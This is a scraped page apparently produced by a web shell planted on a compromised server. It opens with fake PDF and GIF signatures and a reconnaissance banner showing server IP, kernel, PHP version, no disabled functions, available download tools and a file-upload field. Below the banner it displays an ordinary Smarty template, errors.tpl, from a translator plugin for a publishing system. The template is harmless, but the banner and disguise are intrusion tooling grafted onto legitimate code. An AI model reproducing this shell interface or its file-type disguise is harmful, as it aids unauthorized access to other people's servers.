%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/generic/translator/ |
Upload File : |
{**
* plugins/generic/translator/errors.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Error list for a checked locale
*
*}
{strip}
{assign var="pageTitle" value="plugins.generic.translator.errors"}
{include file="common/header.tpl"}
{/strip}
<ul class="menu">
<li><a href="{url op="edit" path=$locale}">{translate key="common.edit"}</a></li>
<li class="current"><a href="{url op="check" path=$locale}">{translate key="plugins.generic.translator.check"}</a></li>
</ul>
<br />
<form action="{url op="saveLocaleChanges" path=$locale}" method="post">
<input type="hidden" name="redirectUrl" value="{url page="translate"}" />
{if $error}
<div id="unwriteableFiles">
<span class="formError">{translate key="plugins.generic.translator.filesNotWriteable"}</span>
<ul class="formErrorList">
{foreach from=$unwriteableFiles item=unwriteableFile}
<li>{$unwriteableFile}</li>
{/foreach}
</ul>
</div>
{/if}
{foreach from=$errors key=type item=categoryErrors}
{if !empty($categoryErrors)}
<h2>{translate key="plugins.generic.translator.errors.$type.title"}</h2>
<ul>
{/if}
{assign var=categoryCount value=0}
{foreach from=$categoryErrors item=error}
<li>
{translate key="plugins.generic.translator.errors.$type.message" params=$error}
{assign var=defaultValue value=$error.reference}
{if $type == 'LOCALE_ERROR_DIFFERING_PARAMS'}
{assign var=wordCount value=$error.reference|explode:" "|@count}
{assign var=categoryCount value=$categoryCount+$wordCount}
<ul>
{foreach from=$error.mismatch item=param}
<li>{$param|escape}</li>
{/foreach}
</ul>
{elseif $type == 'LOCALE_ERROR_EXTRA_KEY'}
<br />
{assign var=counter value=$counter+1}
<input type="checkbox" name="deleteKey[]" id="checkbox-{$counter|escape}" value="{$error.filename|escape:"url"|escape:"url"}/{$error.key|escape}" />
<label for="checkbox-{$counter|escape}">{translate key="plugins.generic.translator.deleteKey"}</label>
{elseif $type == 'LOCALE_ERROR_MISSING_FILE'}
{assign var=filenameEscaped value=$error.filename|escape:"url"|escape:"url"}
{if in_array($error.filename, $localeFiles)}
{url|assign:"redirectUrl" op="editLocaleFile" path=$locale|to_array:$filenameEscaped}
{else}
{url|assign:"redirectUrl" op="editMiscFile" path=$locale|to_array:$filenameEscaped}
{/if}
<a href="{url op="createFile" path=$locale|to_array:$filenameEscaped redirectUrl=$redirectUrl}" onclick='return confirm("{translate|escape:"quotes" key="plugins.generic.translator.saveBeforeContinuing"}")' class="action">{translate key="common.create"}</a>
{else}{* $type == LOCALE_ERROR_MISSING_KEY *}
{assign var=defaultValue value=$error.reference}
{assign var=wordCount value=$defaultValue|explode:" "|@count}
{assign var=categoryCount value=$categoryCount+$wordCount}
<input type="hidden" name="stack[]" value="{$error.filename|escape}" />
<input type="hidden" name="stack[]" value="{$error.key|escape}" />
<br />
{if ($defaultValue|explode:"\n"|@count > 1) || (strlen($defaultValue) > 80)}
{translate key="plugins.generic.translator.file.reference"}<br />
<textarea name="junk[]" class="textArea" cols="80" readonly="true" rows="5">{$defaultValue|escape}</textarea><br />
{translate key="plugins.generic.translator.file.translation"}<br />
<textarea name="stack[]" class="textArea" cols="80" rows="5"></textarea>
{else}
{translate key="plugins.generic.translator.file.reference"}<br />
<input type="text" class="textField" name="junk[]" size="80" readonly="true" value="{$defaultValue|escape}" /><br />
{translate key="plugins.generic.translator.file.translation"}<br />
<input type="text" class="textField" name="stack[]" size="80" value="" />
{/if}
<br />
{/if}
</li>
{/foreach}
</ul>
{if $categoryCount}
(Total {$categoryCount|escape} Words)
{/if}
{/foreach}
{foreach from=$emailErrors key=type item=categoryErrors}
{if !empty($categoryErrors)}
<h2>{translate key="plugins.generic.translator.errors.$type.title"}</h2>
<ul>
{/if}
{foreach from=$categoryErrors item=error}
<li>
{translate key="plugins.generic.translator.errors.$type.message" params=$error}
{if $type == 'EMAIL_ERROR_EXTRA_EMAIL'}
<br />
{assign var=counter value=$counter+1}
<input type="checkbox" name="deleteEmail[]" id="checkbox-{$counter|escape}" value="{$error.key|escape}" />
<label for="checkbox-{$counter|escape}">{translate key="plugins.generic.translator.deleteEmail"}</label>
{else}
<a href="{url op="editEmail" path=$locale|to_array:$error.key returnToCheck=1}" class="action" onclick='return confirm("{translate|escape:"quotes" key="plugins.generic.translator.saveBeforeContinuing"}")'>{translate key="common.edit"}</a>
{/if}
{if $type == 'EMAIL_ERROR_DIFFERING_PARAMS'}
<ul>
{foreach from=$error.mismatch item=param}
<li>{$param|escape}</li>
{/foreach}
</ul>
{/if}
</li>
{/foreach}
</ul>
{/foreach}
{if !empty($errors)}
<input type="submit" class="button defaultButton" value="{translate key="common.save"}" />
{/if}
</form>
{include file="common/footer.tpl"}